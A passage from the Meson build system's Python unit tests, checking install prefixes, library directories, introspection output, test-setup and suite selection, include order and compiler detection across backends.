raise RuntimeError('Invalid backend: {!r}'.format(self.backend.name))
def assertRebuiltTarget(self, target):
ret = self.build()
if self.backend is Backend.ninja:
self.assertIn('Linking target {}'.format(target), ret)
elif self.backend is Backend.vs:
# Ensure that this target was rebuilt
linkre = re.compile('Link:\n [^\n]*link[^\n]*' + target, flags=re.IGNORECASE)
self.assertRegex(ret, linkre)
elif self.backend is Backend.xcode:
raise unittest.SkipTest('Please help us fix this test on the xcode backend')
else:
raise RuntimeError('Invalid backend: {!r}'.format(self.backend.name))
def assertPathExists(self, path):
m = 'Path {!r} should exist'.format(path)
self.assertTrue(os.path.exists(path), msg=m)
def assertPathDoesNotExist(self, path):
m = 'Path {!r} should not exist'.format(path)
self.assertFalse(os.path.exists(path), msg=m)
class AllPlatformTests(BasePlatformTests):
'''
Tests that should run on all platforms
'''
def test_default_options_prefix(self):
'''
Tests that setting a prefix in default_options in project() works.
Can't be an ordinary test because we pass --prefix to meson there.
https://github.com/mesonbuild/meson/issues/1349
'''
testdir = os.path.join(self.common_test_dir, '90 default options')
self.init(testdir, default_args=False)
opts = self.introspect('--buildoptions')
for opt in opts:
if opt['name'] == 'prefix':
prefix = opt['value']
self.assertEqual(prefix, '/absoluteprefix')
def test_do_conf_file_preserve_newlines(self):
def conf_file(in_data, confdata):
with temp_filename() as fin:
with open(fin, 'wb') as fobj:
fobj.write(in_data.encode('utf-8'))
with temp_filename() as fout:
mesonbuild.mesonlib.do_conf_file(fin, fout, confdata, 'meson')
with open(fout, 'rb') as fobj:
return fobj.read().decode('utf-8')
confdata = {'VAR': ('foo', 'bar')}
self.assertEqual(conf_file('@VAR@\n@VAR@\n', confdata), 'foo\nfoo\n')
self.assertEqual(conf_file('@VAR@\r\n@VAR@\r\n', confdata), 'foo\r\nfoo\r\n')
def test_absolute_prefix_libdir(self):
'''
Tests that setting absolute paths for --prefix and --libdir work. Can't
be an ordinary test because these are set via the command-line.
https://github.com/mesonbuild/meson/issues/1341
https://github.com/mesonbuild/meson/issues/1345
'''
testdir = os.path.join(self.common_test_dir, '90 default options')
prefix = '/someabs'
libdir = 'libdir'
extra_args = ['--prefix=' + prefix,
# This can just be a relative path, but we want to test
# that passing this as an absolute path also works
'--libdir=' + prefix + '/' + libdir]
self.init(testdir, extra_args=extra_args, default_args=False)
opts = self.introspect('--buildoptions')
for opt in opts:
if opt['name'] == 'prefix':
self.assertEqual(prefix, opt['value'])
elif opt['name'] == 'libdir':
self.assertEqual(libdir, opt['value'])
def test_libdir_must_be_inside_prefix(self):
'''
Tests that libdir is forced to be inside prefix no matter how it is set.
Must be a unit test for obvious reasons.
'''
testdir = os.path.join(self.common_test_dir, '1 trivial')
# libdir being inside prefix is ok
args = ['--prefix', '/opt', '--libdir', '/opt/lib32']
self.init(testdir, extra_args=args)
self.wipe()
# libdir not being inside prefix is not ok
args = ['--prefix', '/usr', '--libdir', '/opt/lib32']
self.assertRaises(subprocess.CalledProcessError, self.init, testdir, extra_args=args)
self.wipe()
# libdir must be inside prefix even when set via mesonconf
self.init(testdir)
self.assertRaises(subprocess.CalledProcessError, self.setconf, '-Dlibdir=/opt', False)
def test_prefix_dependent_defaults(self):
'''
Tests that configured directory paths are set to prefix dependent
defaults.
'''
testdir = os.path.join(self.common_test_dir, '1 trivial')
expected = {
'/opt': {'prefix': '/opt',
'bindir': 'bin', 'datadir': 'share', 'includedir': 'include',
'infodir': 'share/info',
'libexecdir': 'libexec', 'localedir': 'share/locale',
'localstatedir': 'var', 'mandir': 'share/man',
'sbindir': 'sbin', 'sharedstatedir': 'com',
'sysconfdir': 'etc'},
'/usr': {'prefix': '/usr',
'bindir': 'bin', 'datadir': 'share', 'includedir': 'include',
'infodir': 'share/info',
'libexecdir': 'libexec', 'localedir': 'share/locale',
'localstatedir': '/var', 'mandir': 'share/man',
'sbindir': 'sbin', 'sharedstatedir': '/var/lib',
'sysconfdir': '/etc'},
'/usr/local': {'prefix': '/usr/local',
'bindir': 'bin', 'datadir': 'share',
'includedir': 'include', 'infodir': 'share/info',
'libexecdir': 'libexec',
'localedir': 'share/locale',
'localstatedir': '/var/local', 'mandir': 'share/man',
'sbindir': 'sbin', 'sharedstatedir': '/var/local/lib',
'sysconfdir': 'etc'},
# N.B. We don't check 'libdir' as it's platform dependent, see
# default_libdir():
}
for prefix in expected:
args = ['--prefix', prefix]
self.init(testdir, extra_args=args, default_args=False)
opts = self.introspect('--buildoptions')
for opt in opts:
name = opt['name']
value = opt['value']
if name in expected[prefix]:
self.assertEqual(value, expected[prefix][name])
self.wipe()
def test_default_options_prefix_dependent_defaults(self):
'''
Tests that setting a prefix in default_options in project() sets prefix
dependent defaults for other options, and that those defaults can
be overridden in default_options or by the command line.
'''
testdir = os.path.join(self.common_test_dir, '168 default options prefix dependent defaults')
expected = {
'':
{'prefix': '/usr',
'sysconfdir': '/etc',
'localstatedir': '/var',
'sharedstatedir': '/sharedstate'},
'--prefix=/usr':
{'prefix': '/usr',
'sysconfdir': '/etc',
'localstatedir': '/var',
'sharedstatedir': '/sharedstate'},
'--sharedstatedir=/var/state':
{'prefix': '/usr',
'sysconfdir': '/etc',
'localstatedir': '/var',
'sharedstatedir': '/var/state'},
'--sharedstatedir=/var/state --prefix=/usr --sysconfdir=sysconf':
{'prefix': '/usr',
'sysconfdir': 'sysconf',
'localstatedir': '/var',
'sharedstatedir': '/var/state'},
}
for args in expected:
self.init(testdir, extra_args=args.split(), default_args=False)
opts = self.introspect('--buildoptions')
for opt in opts:
name = opt['name']
value = opt['value']
if name in expected[args]:
self.assertEqual(value, expected[args][name])
self.wipe()
def test_clike_get_library_dirs(self):
env = get_fake_env()
cc = env.detect_c_compiler(MachineChoice.HOST)
for d in cc.get_library_dirs(env):
self.assertTrue(os.path.exists(d))
self.assertTrue(os.path.isdir(d))
self.assertTrue(os.path.isabs(d))
def test_static_library_overwrite(self):
'''
Tests that static libraries are never appended to, always overwritten.
Has to be a unit test because this involves building a project,
reconfiguring, and building it again so that `ar` is run twice on the
same static library.
https://github.com/mesonbuild/meson/issues/1355
'''
testdir = os.path.join(self.common_test_dir, '3 static')
env = get_fake_env(testdir, self.builddir, self.prefix)
cc = env.detect_c_compiler(MachineChoice.HOST)
static_linker = env.detect_static_linker(cc)
if is_windows():
raise unittest.SkipTest('https://github.com/mesonbuild/meson/issues/1526')
if not isinstance(static_linker, mesonbuild.linkers.ArLinker):
raise unittest.SkipTest('static linker is not `ar`')
# Configure
self.init(testdir)
# Get name of static library
targets = self.introspect('--targets')
self.assertEqual(len(targets), 1)
libname = targets[0]['filename'][0]
# Build and get contents of static library
self.build()
before = self._run(['ar', 't', os.path.join(self.builddir, libname)]).split()
# Filter out non-object-file contents
before = [f for f in before if f.endswith(('.o', '.obj'))]
# Static library should contain only one object
self.assertEqual(len(before), 1, msg=before)
# Change the source to be built into the static library
self.setconf('-Dsource=libfile2.c')
self.build()
after = self._run(['ar', 't', os.path.join(self.builddir, libname)]).split()
# Filter out non-object-file contents
after = [f for f in after if f.endswith(('.o', '.obj'))]
# Static library should contain only one object
self.assertEqual(len(after), 1, msg=after)
# and the object must have changed
self.assertNotEqual(before, after)
def test_static_compile_order(self):
'''
Test that the order of files in a compiler command-line while compiling
and linking statically is deterministic. This can't be an ordinary test
case because we need to inspect the compiler database.
https://github.com/mesonbuild/meson/pull/951
'''
testdir = os.path.join(self.common_test_dir, '5 linkstatic')
self.init(testdir)
compdb = self.get_compdb()
# Rules will get written out in this order
self.assertTrue(compdb[0]['file'].endswith("libfile.c"))
self.assertTrue(compdb[1]['file'].endswith("libfile2.c"))
self.assertTrue(compdb[2]['file'].endswith("libfile3.c"))
self.assertTrue(compdb[3]['file'].endswith("libfile4.c"))
# FIXME: We don't have access to the linker command
def test_run_target_files_path(self):
'''
Test that run_targets are run from the correct directory
https://github.com/mesonbuild/meson/issues/957
'''
testdir = os.path.join(self.common_test_dir, '54 run target')
self.init(testdir)
self.run_target('check_exists')
def test_install_introspection(self):
'''
Tests that the Meson introspection API exposes install filenames correctly
https://github.com/mesonbuild/meson/issues/829
'''
if self.backend is not Backend.ninja:
raise unittest.SkipTest('{!r} backend can\'t install files'.format(self.backend.name))
testdir = os.path.join(self.common_test_dir, '8 install')
self.init(testdir)
intro = self.introspect('--targets')
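# Introspection does not guarantee target order, so normalise it so that
# the static library entry comes first.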
if intro[0]['type'] == 'executable':
intro = intro[::-1]
self.assertPathListEqual(intro[0]['install_filename'], ['/usr/lib/libstat.a'])
self.assertPathListEqual(intro[1]['install_filename'], ['/usr/bin/prog' + exe_suffix])
def test_install_subdir_introspection(self):
'''
Test that the Meson introspection API also contains subdir install information
https://github.com/mesonbuild/meson/issues/5556
'''
testdir = os.path.join(self.common_test_dir, '62 install subdir')
self.init(testdir)
intro = self.introspect('--installed')
expected = {
'sub2': 'share/sub2',
'subdir/sub1': 'share/sub1',
'subdir/sub_elided': 'share',
'sub1': 'share/sub1',
'sub/sub1': 'share/sub1',
'sub_elided': 'share',
'nested_elided/sub': 'share',
}
self.assertEqual(len(intro), len(expected))
# Convert expected to PurePath
expected_converted = {PurePath(os.path.join(testdir, key)): PurePath(os.path.join(self.prefix, val)) for key, val in expected.items()}
intro_converted = {PurePath(key): PurePath(val) for key, val in intro.items()}
for src, dst in expected_converted.items():
self.assertIn(src, intro_converted)
self.assertEqual(dst, intro_converted[src])
def test_install_introspection_multiple_outputs(self):
'''
Tests that the Meson introspection API exposes multiple install filenames correctly without crashing
https://github.com/mesonbuild/meson/pull/4555
Reverted to the first file only because of https://github.com/mesonbuild/meson/pull/4547#discussion_r244173438
TODO: Change the format to a list officially in a follow-up PR
'''
if self.backend is not Backend.ninja:
raise unittest.SkipTest('{!r} backend can\'t install files'.format(self.backend.name))
testdir = os.path.join(self.common_test_dir, '144 custom target multiple outputs')
self.init(testdir)
intro = self.introspect('--targets')
if intro[0]['type'] == 'executable':
intro = intro[::-1]
self.assertPathListEqual(intro[0]['install_filename'], ['/usr/include/diff.h', '/usr/bin/diff.sh'])
self.assertPathListEqual(intro[1]['install_filename'], ['/opt/same.h', '/opt/same.sh'])
self.assertPathListEqual(intro[2]['install_filename'], ['/usr/include/first.h', None])
self.assertPathListEqual(intro[3]['install_filename'], [None, '/usr/bin/second.sh'])
def test_install_log_content(self):
'''
Tests that the install-log.txt is consistent with the installed files and directories.
Specifically checks that the log file only contains one entry per file/directory.
https://github.com/mesonbuild/meson/issues/4499
'''
testdir = os.path.join(self.common_test_dir, '62 install subdir')
self.init(testdir)
self.install()
installpath = Path(self.installdir)
# Find installed files and directories
expected = {installpath: 0}
for name in installpath.rglob('*'):
expected[name] = 0
# Find logged files and directories
with Path(self.builddir, 'meson-logs', 'install-log.txt').open() as f:
logged = [Path(line.strip()) for line in f.readlines() if not line.startswith('#')]
for name in logged:
self.assertTrue(name in expected, 'Log contains extra entry {}'.format(name))
expected[name] += 1
for name, count in expected.items():
self.assertGreater(count, 0, 'Log is missing entry for {}'.format(name))
self.assertLess(count, 2, 'Log has multiple entries for {}'.format(name))
def test_uninstall(self):
exename = os.path.join(self.installdir, 'usr/bin/prog' + exe_suffix)
testdir = os.path.join(self.common_test_dir, '8 install')
self.init(testdir)
self.assertPathDoesNotExist(exename)
self.install()
self.assertPathExists(exename)
self.uninstall()
self.assertPathDoesNotExist(exename)
def test_forcefallback(self):
testdir = os.path.join(self.unit_test_dir, '31 forcefallback')
self.init(testdir, extra_args=['--wrap-mode=forcefallback'])
self.build()
self.run_tests()
def test_env_ops_dont_stack(self):
'''
Test that env ops prepend/append do not stack, and that this usage issues a warning
'''
testdir = os.path.join(self.unit_test_dir, '63 test env does not stack')
out = self.init(testdir)
self.assertRegex(out, r'WARNING: Overriding.*TEST_VAR_APPEND')
self.assertRegex(out, r'WARNING: Overriding.*TEST_VAR_PREPEND')
self.assertNotRegex(out, r'WARNING: Overriding.*TEST_VAR_SET')
self.run_tests()
def test_testsetups(self):
if not shutil.which('valgrind'):
raise unittest.SkipTest('Valgrind not installed.')
testdir = os.path.join(self.unit_test_dir, '2 testsetups')
self.init(testdir)
self.build()
# Run tests without setup
self.run_tests()
with open(os.path.join(self.logdir, 'testlog.txt')) as f:
basic_log = f.read()
# Run the buggy test with a setup whose env will make it fail
self.assertRaises(subprocess.CalledProcessError,
self._run, self.mtest_command + ['--setup=valgrind'])
with open(os.path.join(self.logdir, 'testlog-valgrind.txt')) as f:
vg_log = f.read()
self.assertFalse('TEST_ENV is set' in basic_log)
self.assertFalse('Memcheck' in basic_log)
self.assertTrue('TEST_ENV is set' in vg_log)
self.assertTrue('Memcheck' in vg_log)
# Run the buggy test with a setup that has no env; it should pass
self._run(self.mtest_command + ['--setup=wrapper'])
# Setup with no properties works
self._run(self.mtest_command + ['--setup=empty'])
# Setup with only env works
self._run(self.mtest_command + ['--setup=onlyenv'])
self._run(self.mtest_command + ['--setup=onlyenv2'])
self._run(self.mtest_command + ['--setup=onlyenv3'])
# Setup with only a timeout works
self._run(self.mtest_command + ['--setup=timeout'])
def test_testsetup_selection(self):
testdir = os.path.join(self.unit_test_dir, '14 testsetup selection')
self.init(testdir)
self.build()
# Run tests without setup
self.run_tests()
self.assertRaises(subprocess.CalledProcessError, self._run, self.mtest_command + ['--setup=missingfromfoo'])
self._run(self.mtest_command + ['--setup=missingfromfoo', '--no-suite=foo:'])
self._run(self.mtest_command + ['--setup=worksforall'])
self._run(self.mtest_command + ['--setup=main:worksforall'])
self.assertRaises(subprocess.CalledProcessError, self._run,
self.mtest_command + ['--setup=onlyinbar'])
self.assertRaises(subprocess.CalledProcessError, self._run,
self.mtest_command + ['--setup=onlyinbar', '--no-suite=main:'])
self._run(self.mtest_command + ['--setup=onlyinbar', '--no-suite=main:', '--no-suite=foo:'])
self._run(self.mtest_command + ['--setup=bar:onlyinbar'])
self.assertRaises(subprocess.CalledProcessError, self._run,
self.mtest_command + ['--setup=foo:onlyinbar'])
self.assertRaises(subprocess.CalledProcessError, self._run,
self.mtest_command + ['--setup=main:onlyinbar'])
def test_testsetup_default(self):
testdir = os.path.join(self.unit_test_dir, '49 testsetup default')
self.init(testdir)
self.build()
# Running the tests without --setup causes the default setup to be used
self.run_tests()
with open(os.path.join(self.logdir, 'testlog.txt')) as f:
default_log = f.read()
# Run tests with explicitly using the same setup that is set as default
self._run(self.mtest_command + ['--setup=mydefault'])
with open(os.path.join(self.logdir, 'testlog-mydefault.txt')) as f:
mydefault_log = f.read()
# Run tests with another setup
self._run(self.mtest_command + ['--setup=other'])
with open(os.path.join(self.logdir, 'testlog-other.txt')) as f:
other_log = f.read()
self.assertTrue('ENV_A is 1' in default_log)
self.assertTrue('ENV_B is 2' in default_log)
self.assertTrue('ENV_C is 2' in default_log)
self.assertTrue('ENV_A is 1' in mydefault_log)
self.assertTrue('ENV_B is 2' in mydefault_log)
self.assertTrue('ENV_C is 2' in mydefault_log)
self.assertTrue('ENV_A is 1' in other_log)
self.assertTrue('ENV_B is 3' in other_log)
self.assertTrue('ENV_C is 2' in other_log)
def assertFailedTestCount(self, failure_count, command):
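# This helper relies on mtest exiting with a status equal to the number of
# failed tests, which is what the except branch below verifies.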
try:
self._run(command)
self.assertEqual(0, failure_count, 'Expected %d tests to fail.' % failure_count)
except subprocess.CalledProcessError as e:
self.assertEqual(e.returncode, failure_count)
def test_suite_selection(self):
testdir = os.path.join(self.unit_test_dir, '4 suite selection')
self.init(testdir)
self.build()
self.assertFailedTestCount(4, self.mtest_command)
self.assertFailedTestCount(0, self.mtest_command + ['--suite', ':success'])
self.assertFailedTestCount(3, self.mtest_command + ['--suite', ':fail'])
self.assertFailedTestCount(4, self.mtest_command + ['--no-suite', ':success'])
self.assertFailedTestCount(1, self.mtest_command + ['--no-suite', ':fail'])
self.assertFailedTestCount(1, self.mtest_command + ['--suite', 'mainprj'])
self.assertFailedTestCount(0, self.mtest_command + ['--suite', 'subprjsucc'])
self.assertFailedTestCount(1, self.mtest_command + ['--suite', 'subprjfail'])
self.assertFailedTestCount(1, self.mtest_command + ['--suite', 'subprjmix'])
self.assertFailedTestCount(3, self.mtest_command + ['--no-suite', 'mainprj'])
self.assertFailedTestCount(4, self.mtest_command + ['--no-suite', 'subprjsucc'])
self.assertFailedTestCount(3, self.mtest_command + ['--no-suite', 'subprjfail'])
self.assertFailedTestCount(3, self.mtest_command + ['--no-suite', 'subprjmix'])
self.assertFailedTestCount(1, self.mtest_command + ['--suite', 'mainprj:fail'])
self.assertFailedTestCount(0, self.mtest_command + ['--suite', 'mainprj:success'])
self.assertFailedTestCount(3, self.mtest_command + ['--no-suite', 'mainprj:fail'])
self.assertFailedTestCount(4, self.mtest_command + ['--no-suite', 'mainprj:success'])
self.assertFailedTestCount(1, self.mtest_command + ['--suite', 'subprjfail:fail'])
self.assertFailedTestCount(0, self.mtest_command + ['--suite', 'subprjfail:success'])
self.assertFailedTestCount(3, self.mtest_command + ['--no-suite', 'subprjfail:fail'])
self.assertFailedTestCount(4, self.mtest_command + ['--no-suite', 'subprjfail:success'])
self.assertFailedTestCount(0, self.mtest_command + ['--suite', 'subprjsucc:fail'])
self.assertFailedTestCount(0, self.mtest_command + ['--suite', 'subprjsucc:success'])
self.assertFailedTestCount(4, self.mtest_command + ['--no-suite', 'subprjsucc:fail'])
self.assertFailedTestCount(4, self.mtest_command + ['--no-suite', 'subprjsucc:success'])
self.assertFailedTestCount(1, self.mtest_command + ['--suite', 'subprjmix:fail'])
self.assertFailedTestCount(0, self.mtest_command + ['--suite', 'subprjmix:success'])
self.assertFailedTestCount(3, self.mtest_command + ['--no-suite', 'subprjmix:fail'])
self.assertFailedTestCount(4, self.mtest_command + ['--no-suite', 'subprjmix:success'])
self.assertFailedTestCount(2, self.mtest_command + ['--suite', 'subprjfail', '--suite', 'subprjmix:fail'])
self.assertFailedTestCount(3, self.mtest_command + ['--suite', 'subprjfail', '--suite', 'subprjmix', '--suite', 'mainprj'])
self.assertFailedTestCount(2, self.mtest_command + ['--suite', 'subprjfail', '--suite', 'subprjmix', '--suite', 'mainprj', '--no-suite', 'subprjmix:fail'])
self.assertFailedTestCount(1, self.mtest_command + ['--suite', 'subprjfail', '--suite', 'subprjmix', '--suite', 'mainprj', '--no-suite', 'subprjmix:fail', 'mainprj-failing_test'])
self.assertFailedTestCount(2, self.mtest_command + ['--no-suite', 'subprjfail:fail', '--no-suite', 'subprjmix:fail'])
def test_build_by_default(self):
testdir = os.path.join(self.common_test_dir, '133 build by default')
self.init(testdir)
self.build()
genfile1 = os.path.join(self.builddir, 'generated1.dat')
genfile2 = os.path.join(self.builddir, 'generated2.dat')
exe1 = os.path.join(self.builddir, 'fooprog' + exe_suffix)
exe2 = os.path.join(self.builddir, 'barprog' + exe_suffix)
self.assertPathExists(genfile1)
self.assertPathExists(genfile2)
self.assertPathDoesNotExist(exe1)
self.assertPathDoesNotExist(exe2)
self.build(target=('fooprog' + exe_suffix))
self.assertPathExists(exe1)
self.build(target=('barprog' + exe_suffix))
self.assertPathExists(exe2)
def test_internal_include_order(self):
testdir = os.path.join(self.common_test_dir, '134 include order')
self.init(testdir)
execmd = fxecmd = None
for cmd in self.get_compdb():
if 'someexe' in cmd['command']:
execmd = cmd['command']
continue
if 'somefxe' in cmd['command']:
fxecmd = cmd['command']
continue
if not execmd or not fxecmd:
raise Exception('Could not find someexe and somefxe commands')
# Check include order for 'someexe'
incs = [a for a in split_args(execmd) if a.startswith("-I")]
self.assertEqual(len(incs), 9)
# target private dir
someexe_id = Target.construct_id_from_path("sub4", "someexe", "@exe")
self.assertPathEqual(incs[0], "-I" + os.path.join("sub4", someexe_id))
# target build subdir
self.assertPathEqual(incs[1], "-Isub4")
# target source subdir
self.assertPathBasenameEqual(incs[2], 'sub4')
# include paths added via per-target c_args: ['-I'...]
self.assertPathBasenameEqual(incs[3], 'sub3')
# target include_directories: build dir
self.assertPathEqual(incs[4], "-Isub2")
# target include_directories: source dir
self.assertPathBasenameEqual(incs[5], 'sub2')
# target internal dependency include_directories: build dir
self.assertPathEqual(incs[6], "-Isub1")
# target internal dependency include_directories: source dir
self.assertPathBasenameEqual(incs[7], 'sub1')
# custom target include dir
self.assertPathEqual(incs[8], '-Ictsub')
# Check include order for 'somefxe'
incs = [a for a in split_args(fxecmd) if a.startswith('-I')]
self.assertEqual(len(incs), 9)
# target private dir
self.assertPathEqual(incs[0], '-Isomefxe@exe')
# target build dir
self.assertPathEqual(incs[1], '-I.')
# target source dir
self.assertPathBasenameEqual(incs[2], os.path.basename(testdir))
# target internal dependency correct include_directories: build dir
self.assertPathEqual(incs[3], "-Isub4")
# target internal dependency correct include_directories: source dir
self.assertPathBasenameEqual(incs[4], 'sub4')
# target internal dependency dep include_directories: build dir
self.assertPathEqual(incs[5], "-Isub1")
# target internal dependency dep include_directories: source dir
self.assertPathBasenameEqual(incs[6], 'sub1')
# target internal dependency wrong include_directories: build dir
self.assertPathEqual(incs[7], "-Isub2")
# target internal dependency wrong include_directories: source dir
self.assertPathBasenameEqual(incs[8], 'sub2')
def test_compiler_detection(self):
'''
Test that automatic compiler detection and setting from the environment
both work just fine. This is needed because while running project tests
and other unit tests, we always read CC/CXX/etc from the environment.
'''
gnu = mesonbuild.compilers.GnuCompiler
clang = mesonbuild.compilers.ClangCompiler
intel = mesonbuild.compilers.IntelGnuLikeCompiler
msvc = (mesonbuild.compilers.VisualStudioCCompiler, mesonbuild.compilers.VisualStudioCPPCompiler)
clangcl = (mesonbuild.compilers.ClangClCCompiler, mesonbuild.compilers.ClangClCPPCompiler)
ar = mesonbuild.linkers.ArLinker
lib = mesonbuild.linkers.VisualStudioLinker
langs = [('c', 'CC'), ('cpp', 'CXX')]
if not is_windows():
langs += [('objc', 'OBJC'), ('objcpp', 'OBJCXX')]
testdir = os.path.join(self.unit_test_dir, '5 compiler detection')
env = get_fake_env(testdir, self.builddir, self.prefix)
for lang, evar in langs:
# Detect with evar and do sanity checks on that
if evar in os.environ:
ecc = getattr(env, 'detect_{}_compiler'.format(lang))(MachineChoice.HOST)
self.assertTrue(ecc.version)
elinker = env.detect_static_linker(ecc)
# Pop it so we don't use it for the next detection
evalue = os.environ.pop(evar)
# Very rough/strict heuristics. Would never work for actual
# compiler detection, but should be ok for the tests.
ebase = os.path.basename(evalue)
if ebase.startswith('g') or ebase.endswith(('-gcc', '-g++')):
self.assertIsInstance(ecc, gnu)
self.assertIsInstance(elinker, ar)
elif 'clang-cl' in ebase:
self.assertIsInstance(ecc, clangcl)
self.assertIsInstance(elinker, lib)
elif 'clang' in ebase:
self.assertIsInstance(ecc, clang)
self.assertIsInstance(elinker, ar)
elif ebase.startswith('ic'):
self.assertIsInstance(ecc, intel)
self.assertIsInstance(elinker, ar)
elif ebase.startswith('cl'):
self.assertIsInstance(ecc, msvc)
self.assertIsInstance(elinker, lib)
else:
raise AssertionError('Unknown compiler {!r}'.format(evalue))
# Check that we actually used the evalue correctly as the compiler
self.assertEqual(ecc.get_exelist(), split_args(evalue))
# Do auto-detection of compiler based on platform, PATH, etc.
cc = getattr(env, 'detect_{}_compiler'.format(lang))(MachineChoice.HOST)
self.assertTrue(cc.version)
linker = env.detect_static_linker(cc)
# Check compiler type
if isinstance(cc, gnu):
self.assertIsInstance(linker, ar)
if is_osx():
self.assertIsInstance(cc.linker, mesonbuild.linkers.AppleDynamicLinker)
else:
self.assertIsInstance(cc.linker, mesonbuild.linkers.GnuLikeDynamicLinkerMixin)
if isinstance(cc, clangcl):
self.assertIsInstance(linker, lib)
self.assertIsInstance(cc.linker, mesonbuild.linkers.ClangClDynamicLinker)
if isinstance(cc, clang):
self.assertIsInstance(linker, ar)
if is_osx():
self.assertIsInstance(cc.linker, mesonbuild.linkers.AppleDynamicLinker)
elif is_windows():
# This is clang, not clang-cl
self.assertIsInstance(cc.linker, mesonbuild.linkers.MSVCDynamicLinker)
else:
self.assertIsInstance(cc.linker, mesonbuild.linkers.GnuLikeDynamicLinkerMixin)
if isinstance(cc, intel):
self.assertIsInstance(linker, ar)
if is_osx():
self.assertIsInstance(cc.linker, mesonbuild.linkers.XildAppleDynamicLinker)
elif is_windows():
self.assertIsInstance(cc.linker, mesonbuild.linkers.XilinkDynamicLinker)
else:
self.assertIsInstance(cc.linker, mesonbuild.linkers.XildLinuxDynamicLinker)
if isinstance(cc, msvc):
self.assertTrue(is_windows())
self.assertIsInstance(linker, lib)
self.assertEqual(cc.id, 'msvc')
self.assertTrue(hasattr(cc, 'is_64'))
self.assertIsInstance(cc.linker, mesonbuild.linkers.MSVCDynamicLinker)
# If we're on Windows CI, we know what the compiler will be
if 'arch' in os.environ:
if os.environ['arch'] == 'x64':
self.assertTrue(cc.is_64)
else:
self.assertFalse(cc.is_64)
# Set evar ourselves to a wrapper script that just calls the same
# exelist + some argument. This is meant to test that setting
# something like `ccache gcc -pipe` or `distcc ccache gcc` works.
wrapper = os.path.join(testdir, 'compiler wrapper.py')
wrappercc = python_command + [wrapper] + cc.get_exelist() + ['-DSOME_ARG']
wrappercc_s = ''
for w in wrappercc:
wrappercc_s += quote_arg(w) + ' '
os.environ[evar] = wrappercc_s
wcc = getattr(env, 'detect_{}_compiler'.format(lang))(MachineChoice.HOST)
# Check static linker too
wrapperlinker = python_command + [wrapper] + linker.get_exelist() + linker.get_always_args()
wrapperlinker_s = ''
for w in wrapperlinker:
wrapperlinker_s += quote_arg(w) + ' '
os.environ['AR'] = wrapperlinker_s
wlinker = env.detect_static_linker(wcc)
# Pop it so we don't use it for the next detection
evalue = os.environ.pop('AR')
# Must be the same type since it's a wrapper around the same exelist
self.assertIs(type(cc), type(wcc))
self.assertIs(type(linker), type(wlinker))
# Ensure that the exelist is correct
self.assertEqual(wcc.get_exelist(), wrappercc)
self.assertEqual(wlinker.get_exelist(), wrapperlinker)
# Ensure that the version detection worked correctly
self.assertEqual(cc.version, wcc.version)
if hasattr(cc, 'is_64'):
self.assertEqual(cc.is_64, wcc.is_64)
def test_always_prefer_c_compiler_for_asm(self):
testdir = os.path.join(self.common_test_dir, '137 c cpp and asm')
# Skip if building with MSVC
env = get_fake_env(testdir, self.builddir, self.prefix)
if env.detect_c_compiler(MachineChoice.HOST).get_id() == 'msvc':
raise unittest.SkipTest('MSVC can\'t compile assembly')
self.init(testdir)
commands = {'c-asm': {}, 'cpp-asm': {}, 'cpp-c-asm': {}, 'c-cpp-asm': {}}
for cmd in self.get_compdb():
# Get compiler
split = split_args(cmd['command'])
if split[0] == 'ccache':
compiler = split[1]
else:
compiler = split[0]
# Classify commands
if 'Ic-asm' in cmd['command']:
if cmd['file'].endswith('.S'):
commands['c-asm']['asm'] = compiler
elif cmd['file'].endswith('.c'):
commands['c-asm']['c'] = compiler
else:
raise AssertionError('{!r} found in c-asm?'.format(cmd['command']))
elif 'Icpp-asm' in cmd['command']:
if cmd['file'].endswith('.S'):
commands['cpp-asm']['asm'] = compiler
elif cmd['file'].endswith('.cpp'):
commands['cpp-asm']['cpp'] = compiler
else:
raise AssertionError('{!r} found in cpp-asm?'.format(cmd['command']))
elif 'Ic-cpp-asm' in cmd['command']:
if cmd['file'].endswith('.S'):
commands['c-cpp-asm']['asm'] = compiler
elif cmd['file'].endswith('.c'):
commands['c-cpp-asm']['c'] = compiler
elif cmd['file'].endswith('.cpp'):
commands['c-cpp-asm']['cpp'] = compiler
else:
raise AssertionError('{!r} found in c-cpp-asm?'.format(cmd['command']))
elif 'Icpp-c-asm' in cmd['command']:
if cmd['file'].endswith('.S'):
commands['cpp-c-asm']['asm'] = compiler
elif cmd['file'].endswith('.c'):
commands['cpp-c-asm']['c'] = compiler
elif cmd['file'].endswith('.cpp'):
commands['cpp-c-asm']['cpp'] = compiler
else:
raise AssertionError('{!r} found in cpp-c-asm?'.format(cmd['command']))
else:
raise AssertionError('Unknown command {!r} found'.format(cmd['command']))
# Check that .S files are always built with the C compiler
self.assertEqual(commands['c-asm']['asm'], commands['c-asm']['c'])
self.assertEqual(commands['c-asm']['asm'], commands['cpp-asm']['asm'])
self.assertEqual(commands['cpp-asm']['asm'], commands['c-cpp-asm']['c'])
self.assertEqual(commands['c-cpp-asm']['asm'], commands['c-cpp-asm']['c'])
self.assertEqual(commands['cpp-c-asm']['asm'], commands['cpp-c-asm']['c'])
self.assertNotEqual(commands['cpp-asm']['asm'], commands['cpp-asm']['cpp'])
self.assertNotEqual(commands['c-cpp-asm']['c'], commands['c-cpp-asm']['cpp'])
self.assertNotEqual(commands['cpp-c-asm']['c'], commands['cpp-c-asm']['cpp'])
# Check that the c-asm target is always linked with the C linker
build_ninja = os.path.join(self.builddir, 'build.ninja')
with open(build_ninja, 'r', encoding='utf-8') as f:
contents = f.read()
m = re.search('build c-asm.*: c_LINKER', contents)
self.assertIsNotNone(m, msg=contents)
def test_preprocessor_checks_CPPFLAGS(self):
'''
Test that preprocessor compiler checks read CPPFLAGS and also CFLAGS but
not LDFLAGS.
'''
testdir = os.path.join(self.common_test_dir, '136 get define')
define = 'MESON_TEST_DEFINE_VALUE'
# NOTE: this list can't have \n, ' or "
# \n is never substituted by the GNU pre-processor via a -D define
# ' and " confuse split_args() even when they are escaped
# % and # confuse the MSVC preprocessor
# !, ^, *, and < confuse lcc preprocessor
value = 'spaces and fun@$&()-=_+{}[]:;>?,./~`'
for env_var in ['CPPFLAGS', 'CFLAGS']:
env = {}
env[env_var] = '-D{}="{}"'.format(define, value)
env['LDFLAGS'] = '-DMESON_FAIL_VALUE=cflags-read'
self.init(testdir, extra_args=['-D{}={}'.format(define, value)], override_envvars=env)
def test_custom_target_exe_data_deterministic(self):
testdir = os.path.join(self.common_test_dir, '113 custom target capture')
self.init(testdir)
meson_exe_dat1 = glob(os.path.join(self.privatedir, 'meson_exe*.dat'))
self.wipe()
self.init(testdir)
